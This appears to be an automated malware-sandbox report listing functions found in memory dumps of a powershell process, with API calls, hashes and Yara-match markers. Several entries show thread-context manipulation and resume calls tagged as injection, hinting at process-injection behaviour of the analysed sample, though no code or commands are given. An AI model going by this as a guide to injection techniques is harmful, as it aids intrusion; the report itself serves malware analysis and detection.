Function 000001A6ED34C754 Relevance: 3.0, APIs: 2, Instructions: 41nativeCOMMONLIBRARYCODE

Download Yara Rule

APIs

NtClose.NTDLL ref: 000001A6ED34C788
SetLastError.KERNEL32 ref: 000001A6ED34C7D6

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CloseErrorLast
String ID:
API String ID: 3262646002-0
Opcode ID: c310d0f248c33cdb3ebe84675ae115457be158eb74f330db2193df7989e9f360
Instruction ID: 0456dce2177e47461b44f25b229b2e439d94626dc8c3fb543a8725d0dd93547d
Opcode Fuzzy Hash: c310d0f248c33cdb3ebe84675ae115457be158eb74f330db2193df7989e9f360
Instruction Fuzzy Hash: 7901793D307641D7FB54CB5DAD903E926A0A777771F5C46248529826D1CB1E448DC202

Function 000001A6ED34CB7C Relevance: 3.0, APIs: 2, Instructions: 36threadnativeCOMMON

Download Yara Rule

APIs

NtGetContextThread.NTDLL ref: 000001A6ED34CBAC
GetThreadContext.KERNEL32 ref: 000001A6ED34CBEE

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 9aa08a41824a6887f25afed7e2dec8bb7f87ebe7b081a9c0e8eefdc1c27d7f62
Instruction ID: 8f834fe19e83f40e0478bb580ab8ca6f1d109c88468cfa9f949afdecd2a1870c
Opcode Fuzzy Hash: 9aa08a41824a6887f25afed7e2dec8bb7f87ebe7b081a9c0e8eefdc1c27d7f62
Instruction Fuzzy Hash: BD012C3C306940D1EA64CB5DB9803F923A1A76BB80F5C4025D84997A95DBAFC49AC702

Function 000001A6ED34D0B0 Relevance: 3.0, APIs: 2, Instructions: 36threadnativeinjectionCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 000001A6ED34D0E0
SetThreadContext.KERNEL32 ref: 000001A6ED34D122

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 32c895d4cf86b11fcd311ac4aa5d99ef6d4ac225d491934d64c2daa716299de9
Instruction ID: 043f844d62d3bd6e5b5b26e67281667edab8ae3aa6d9a6133c8966d33a345e17
Opcode Fuzzy Hash: 32c895d4cf86b11fcd311ac4aa5d99ef6d4ac225d491934d64c2daa716299de9
Instruction Fuzzy Hash: 25014B3C306580D1FAA4CB49B9853ED63A2AB6B7C2F1C6024DD09876D5CB6EC48AC203

Function 000001A6ED341268 Relevance: 3.0, APIs: 2, Instructions: 32processCOMMON

Download Yara Rule

APIs

CreateProcessWithLogonW.ADVAPI32 ref: 000001A6ED3412B7
GetLastError.KERNEL32 ref: 000001A6ED3412C8

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateErrorLastLogonProcessWith
String ID:
API String ID: 2609480667-0
Opcode ID: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
Instruction ID: f4ffed19463472986ebadca75ad4da025662d24448462a69faf8603e05c33a23
Opcode Fuzzy Hash: 8fcebf3f7d0e2333a3ca458f2652207579a2a29baf972c8fdebcbca856c98942
Instruction Fuzzy Hash: 2001EC79725F08D2E750CB6AE44839D23E0F32ABD1F190125DA6C8B391DB3AC49A8715

Function 00007FFD3479AEFA Relevance: 2.8, Strings: 2, Instructions: 303COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD3479B039
4, xrefs: 00007FFD3479AF50

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: 4$H
API String ID: 0-1439480922
Opcode ID: 1f1e287907911dbcdd90c2bb2d5c3c463d5ee58522923558e409fc5f14ab3984
Instruction ID: 0bc33e8a3b912a617cab048fcc346fcb73936c801a7b8ce9946a0c931ca2b6c9
Opcode Fuzzy Hash: 1f1e287907911dbcdd90c2bb2d5c3c463d5ee58522923558e409fc5f14ab3984
Instruction Fuzzy Hash: 6291A7D7B0E7C2AAE652866C5CFA0E93B94EF53365B0900B7C694C7093ED1D28079692

Function 000001A6ED30C397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

ailure #%d - %s, xrefs: 000001A6ED30C41F, 000001A6ED30C498, 000001A6ED30C511, 000001A6ED30C58A
e ', xrefs: 000001A6ED30C405, 000001A6ED30C47E, 000001A6ED30C4F7, 000001A6ED30C570

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID: ailure #%d - %s$e '
API String ID: 0-4163927988
Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction ID: 3a90b1baacc0b2b20698b18ade122024814562cfb7b2c409dc88d641cea036d2
Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction Fuzzy Hash: 3E610DB63156508BD714CB0DE49066AB7E2F3CEBD4F88421AE38B87768DA3CD549CB40

Function 00007FFD3479A475 Relevance: 1.9, Strings: 1, Instructions: 663COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD3479A5C8

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 072abd287b21890bc002bfead996fc366d05dc9ebd3de9d5e038414eac6dd96a
Instruction ID: c7b00f4b4e348d3c9edbef60e79077c90e59e78cbb9f3b2906598e4948eeb608
Opcode Fuzzy Hash: 072abd287b21890bc002bfead996fc366d05dc9ebd3de9d5e038414eac6dd96a
Instruction Fuzzy Hash: 2C220572B0DA8A8FEB95DB5CC8A59E97BE0FF56314F14017AC148D7192DE28B842C7C1

Function 000001A6ED34D030 Relevance: 1.7, APIs: 1, Instructions: 222nativethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 000001A6ED34D05E

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ab61d958565e2a2384a3c637d7c92cb9f10c13c6a5508be91345c4d843d40d10
Instruction ID: 757321a53041a9f2233b4c3d4b44168b9790eaeb33002e41d1075773747339f8
Opcode Fuzzy Hash: ab61d958565e2a2384a3c637d7c92cb9f10c13c6a5508be91345c4d843d40d10
Instruction Fuzzy Hash: C6811F6F71F9C18AF6B1CA1C0A962CC1BD5E777B54F5F508ACB508B2C2E64A484D8313

Function 000001A6ED340920 Relevance: 1.5, APIs: 1, Instructions: 33pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 000001A6ED34098A

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
Instruction ID: ceaeb79021019709a80cf56f41e3695013236f0bb55e776f162fdd0b4a340cdc
Opcode Fuzzy Hash: ffc033c595a008210ccbf7715394fddec234f51f7fbc04560c83c088a3818f65
Instruction Fuzzy Hash: 9C018739722B80DAEA21CB14F44039A76A1F7AB329F484318D6A8026E5EB7CC00DCB01

Function 00007FFD34866B92 Relevance: .7, Instructions: 656COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604831158.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be427c8391c2b4a4ceca4cd62768dc79b3d9c67150a7d5777c869efca771c5b
Instruction ID: b3db55539a0bdd6d73b2b9bb12131817b1192a57dabc58181f174deecc88cb8d
Opcode Fuzzy Hash: 2be427c8391c2b4a4ceca4cd62768dc79b3d9c67150a7d5777c869efca771c5b
Instruction Fuzzy Hash: 27124931A0DAC94FE7D5DF2888A46B47BE1EF96320F5801BED64DD71A2D92CAC45C341

Function 000001A6ED30CFF0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: 60a9af214e1d4a5e87813029477b7eecc455b97df17585f34c9341cbad4e4148
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 9F525FB63149418BD708CB1CE4A177AB7A2F3CAB80F44852AE7978B799CE3DD555CB00

Function 000001A6ED35DBF0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: aaaf275fb3c59db55162f3dc3d619aedc1d75cf6d5e9d4fa819e681c156be8ad
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 4A526FB63149818BD708CB1CE4A177AB7E1F3CAB80F44852AE7978B799CA3DD544CB44

Function 00007FFD34796CCD Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d59eec16ca6a74c122131dd817eb44c8cb8eaf3e157bc23f4a5822c7fdaade5
Instruction ID: bcc3f286b36a33716b2bdb05a91e39d27427e76f5812c0e7e5c653e4f076f1b2
Opcode Fuzzy Hash: 3d59eec16ca6a74c122131dd817eb44c8cb8eaf3e157bc23f4a5822c7fdaade5
Instruction Fuzzy Hash: 9D12C471A08A4D8FDF95EF58C4A5AE97BE1FF66300F1442AAD04DD7252DA38F845CB80

Function 000001A6ED30C680 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: 11ca18f3b20add0e3c1c5d4bfc998218481510ecc7976936e0ed6f0e5b5e9959
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: 2C5252B630499187D708CB1DE4A177AB7E2F3CEB80F44852AE7968B798CA3DD545CB40

Function 000001A6ED35D280 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: 7aa943b6079f3e0f3a2ba4a52cd920b2aac639855ccd3963cdf4ae26d9449d56
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: 505251B63149808BD708CB1DE4A177AB7E1F3CAB80F44852AE7968B799CA3DD545CF40

Function 00007FFD347944FB Relevance: .5, Instructions: 490COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e360dd9f58cbef72d4d0178af1861332e9c5774ccf03799f862a72911ac23b5
Instruction ID: a88b4853c01220dcf4431cb3ce5599c6c160adfe1222990ad5619631e2c53981
Opcode Fuzzy Hash: 8e360dd9f58cbef72d4d0178af1861332e9c5774ccf03799f862a72911ac23b5
Instruction Fuzzy Hash: 76F1D371B0CA498FEB95DF5CC4A5AED7BF1FF9A310F14016AC109D7296DA28A842C7C1

Function 000001A6ED2E9680 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b36a1ba920152f78f5c99ec07692126c53d6c4271340491167fca338511aeeea
Instruction ID: 79d2370fc20992e3c22156818f80ceef760436de948059ca901ebcf1cbffe32e
Opcode Fuzzy Hash: b36a1ba920152f78f5c99ec07692126c53d6c4271340491167fca338511aeeea
Instruction Fuzzy Hash: 10F1B87A305A42CAEBA2CB3DE4903DE63A1F7A6794F580116DF4D87785EA34C909CB41

Function 000001A6ED33A280 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
Instruction ID: ddb6cfecea78d1aed0ae1d03bfad9265b57c17b36c6a8f6affc2d0f66fd0024a
Opcode Fuzzy Hash: 39230a270b39aa7a03f1acc75e1d4406c9dcc848d7b32e178703d764618bc014
Instruction Fuzzy Hash: D7F1C97A305A42C2EB20CB6DD6983DE63E1F7A7788F580115EB5987785EE38C909CB41

Function 000001A6ED2ECE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
Instruction ID: 645e337efcba103bc6f09f2eb181e77c852ceec2160e229eb11243f2675fd884
Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
Instruction Fuzzy Hash: 26E18F7AB11701CBFBA5CB79E8413EA63A1F766344F0C5525DF8A97B82DA3CE4498301

Function 000001A6ED2E916C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ded89e024328b8bde828ed96247666ffad05db40743fc4f94469b939fdd8d3ab
Instruction ID: 9d2d41c7109a199385270d9d8f030b29d4979cfc96c87ad7eb8bd3af65442c56
Opcode Fuzzy Hash: ded89e024328b8bde828ed96247666ffad05db40743fc4f94469b939fdd8d3ab
Instruction Fuzzy Hash: EDE1E87A705A42D9EFA2DB3DD4903DE63A1F7A6788F880113DF4D87689EA34C909C741

Function 000001A6ED339D6C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
Instruction ID: 472103aff172a479b8c921290fe49d846fc34649718759e1dac1d81b36cab9b8
Opcode Fuzzy Hash: fb1a47b38430a28a9ce52fe961906e0d16b6bf2ab463da1186ab792c5180ee2f
Instruction Fuzzy Hash: 01E1F77B305A42D1EB20DB6DD5843EE63A1F7A77C8F880011EA6DC7A89EA35C94DC741

Function 00007FFD347926F5 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 743dbd174480e1cb22c03a55f4cd6af6144919d2be01a3fceeee9de6d5f0fe4b
Instruction ID: a78a2eeea5f275bfe47a1016395f05f64b535dfb2966dd359a67eae27361ef5b
Opcode Fuzzy Hash: 743dbd174480e1cb22c03a55f4cd6af6144919d2be01a3fceeee9de6d5f0fe4b
Instruction Fuzzy Hash: 1F718497A0E7C29FF392563858B64A93FD4DF1322470A05F7C694DE0A3DD1D2846A262

Function 00007FFD34792EFA Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15024f9aa491f3fab40081af02f78dce006fa5e45c0d76b2ee8106bc41cb3b66
Instruction ID: 8d58f817437bb685498753e58ecff40ba165faf157ab3824632dace067b9d80c
Opcode Fuzzy Hash: 15024f9aa491f3fab40081af02f78dce006fa5e45c0d76b2ee8106bc41cb3b66
Instruction Fuzzy Hash: 8D61ECA3A0D6C3AFE352976CA8F70D937D4DF5323870946B3C584CA0A3ED1D28579691

Function 00007FFD34794322 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac3a46b03a30990ddb2bd9cf3eaa223aaa37dc1d3138642d39eb39d17606f2f9
Instruction ID: 837f0647d8f5305a07bbf8f5711889c620a57b92226194a4c3e040a8b9c980d5
Opcode Fuzzy Hash: ac3a46b03a30990ddb2bd9cf3eaa223aaa37dc1d3138642d39eb39d17606f2f9
Instruction Fuzzy Hash: C551776770E7C59EE612977C6CF50E97FA0DE9322570905F7C684DB0A3ED0D240A93A2

Function 000001A6ED3622A0 Relevance: .2, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd5bdd0290a5bad3f9cb08e822b129d084ef37f476576329e82c15087426a89
Instruction ID: b189639b4d6027fb3962efea18bb3ff80ca9457e4cab782e43e24d063eee584b
Opcode Fuzzy Hash: 7dd5bdd0290a5bad3f9cb08e822b129d084ef37f476576329e82c15087426a89
Instruction Fuzzy Hash: 6551BC6F66E9C189F2B2C91C0EA62CC1FD5E777B14F5F50CA8B504B2C2D646580D5217

Function 000001A6ED2F0334 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
Instruction ID: 82a9b16db04417b13a6f30aeaebf4920bb471f244064628696c91a29299f7ba3
Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
Instruction Fuzzy Hash: 4471A43A716A40CAEBA0CF29E5403DD73E1F76AB94F185925DB4947795CF38C84C8B42

